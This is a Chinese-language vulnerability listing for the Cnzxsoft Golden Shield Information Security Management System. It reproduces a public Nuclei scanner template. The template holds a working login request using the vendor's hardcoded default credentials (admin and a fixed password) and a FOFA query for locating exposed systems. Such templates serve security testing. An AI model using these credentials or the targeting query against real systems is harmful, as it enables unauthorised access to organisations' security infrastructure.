cnzxsoft-default-login: Cnzxsoft System - Default Login

日期: 2025-08-01 | 影响软件: Cnzxsoft System | POC: 已公开

漏洞描述

Cnzxsoft Golden Shield Information Security Management System has a default weak password.

PoC代码[已公开]

id: cnzxsoft-default-login

info:
  name: Cnzxsoft System - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Cnzxsoft Golden Shield Information Security Management System has a default weak password.
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'title=="中新金盾信息安全管理系统"'
  tags: default-login,cnzxsoft,vuln

http:
  - raw:
      - |
        POST /?q=common/login  HTTP/1.1
        Host: {{Hostname}}
        Cookie: check_code=ptbh
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&password={{password}}&checkcode=ptbh&doLoginSubmit=1

    payloads:
      username:
        - 'admin'
      password:
        - 'zxsoft1234!@#$'
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
        condition: and
# digest: 4a0a00473045022010784025d84e39467a76569e97f6fca7410c1f8b6abb427f29d906bdbc213c55022100a080d36c678fd620cb2bebe89ad9cac287fe025646e5d13c76836d8176a6ae1b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/others/cnzxsoft-default-login.yaml